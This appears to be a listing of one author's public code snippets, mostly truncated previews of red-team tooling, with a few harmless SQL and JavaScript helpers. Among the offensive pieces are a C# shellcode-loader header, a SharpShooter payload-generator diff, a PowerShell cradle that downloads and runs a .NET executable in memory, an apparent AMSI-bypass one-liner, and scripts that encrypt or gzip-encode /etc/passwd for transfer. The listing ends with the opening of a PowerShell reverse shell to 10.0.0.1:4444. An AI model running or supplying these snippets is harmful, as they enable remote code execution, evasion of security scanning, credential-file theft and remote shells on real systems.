FrankSpierings

/*
    - Compile: docker run --rm -it -v /tmp/data:/tmp/data mono csc /tmp/data/dinvoke-shellcode.cs -out:/tmp/data/dinvoke-shellcode.exe /platform:x64 /unsafe
    - Reference (Thanks!) : https://jhalon.github.io/utilizing-syscalls-in-csharp-1/
*/
using System;
using System.Runtime.InteropServices;
using System.Diagnostics;
using System.ComponentModel;
using Microsoft.Win32;

FrankSpierings

function Invoke-SQLCmd {
    param(
        [Parameter(Mandatory=$True)]
        [string] $Server,
        [Parameter(Mandatory=$True)]
        [string] $Database,
        [Parameter(Mandatory=$True)]
        [string] $Query
    );

FrankSpierings

diff --git a/SharpShooter.py b/SharpShooter.py
index 9b10de1..50cece0 100644
--- a/SharpShooter.py
+++ b/SharpShooter.py
@@ -286,7 +286,7 @@ End Sub"""
                 raise Exception
 
             if(payload_type == 1):
-                if(args.comtechnique):
+                if(args.comtechnique or args.dotnetver == str(4)):

FrankSpierings

$url = "http://server/dotnetexecutable"
$data = (New-Object System.Net.WebClient).DownloadData($url);
$assem = [System.Reflection.Assembly]::Load($data);
$main = $assem.EntryPoint
$main.Invoke(0, @(,[string[]]@("args0")));

FrankSpierings

[Runtime.InteropServices.Marshal]::Copy([Int32[]]@(0), 0,(([Ref].Assembly.GetTypes()|?{$_.Name -like "*iUtils"}).GetFields('NonPublic,Static')|?{$_.Name -match "Context"}).GetValue($null), 1)

FrankSpierings

const { refactor } = require('shift-refactor');
const { commonMethods } = require('refactor-plugin-common');
const Shift = require('shift-ast');
const fs = require('fs');

const src = `
var a = "aap";

function foo() {
	function bar() {

FrankSpierings

powershell "$sql='SELECT @@VERSION';$c=(New-Object -TypeName System.Data.SqlClient.SqlConnection('server=SERVER;Database=DATABASE;Integrated Security=True;'));$c.open();$q=(New-Object System.Data.SqlClient.SqlCommand($sql,$c));$r=$q.ExecuteReader();$oo=@();while ($r.Read()){$o=(New-Object PSObject);for ($i=0;$i -lt $r.FieldCount;$i++){$n=$r.GetName($i);if($n -eq ''){$n='column_'+$i};$o|Add-Member -type NoteProperty -Name $n -Value $r[$i];}$oo+=$o};$oo|FT -Wrap"

FrankSpierings

$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open);
$ms = New-Object System.IO.MemoryStream;
$aes = [System.Security.Cryptography.Aes]::Create();
$aes.keysize = 128;
Write-Host "Key: " (($aes.Key |% ToString X2) -join '');
Write-Host "IV: " (($aes.IV |% ToString X2) -join '');
Write-Host "Mode: " $aes.mode
$cs = New-Object System.Security.Cryptography.CryptoStream($ms, $aes.CreateEncryptor(), [System.Security.Cryptography.CryptoStreamMode]::Write);
$fs.CopyTo($cs);

FrankSpierings

$filepath = "/etc/passwd"
$fs = New-Object IO.FileStream($filepath, [System.IO.FileMode]::Open)
$ms = New-Object System.IO.MemoryStream;
$gzs = New-Object System.IO.Compression.GzipStream($ms, [System.IO.Compression.CompressionMode]::Compress);
$fs.CopyTo($gzs);
$fs.Close();
$gzs.Close();
$ms.Close();

[System.Convert]::ToBase64String($ms.ToArray());

FrankSpierings

import codecs
import base64


data = '''$lhost="10.0.0.1";
$lport=4444;

$MAXCMDLENGTH=65535;
$client = New-Object System.Net.Sockets.TCPClient($lhost, $lport);
$stream = $client.GetStream();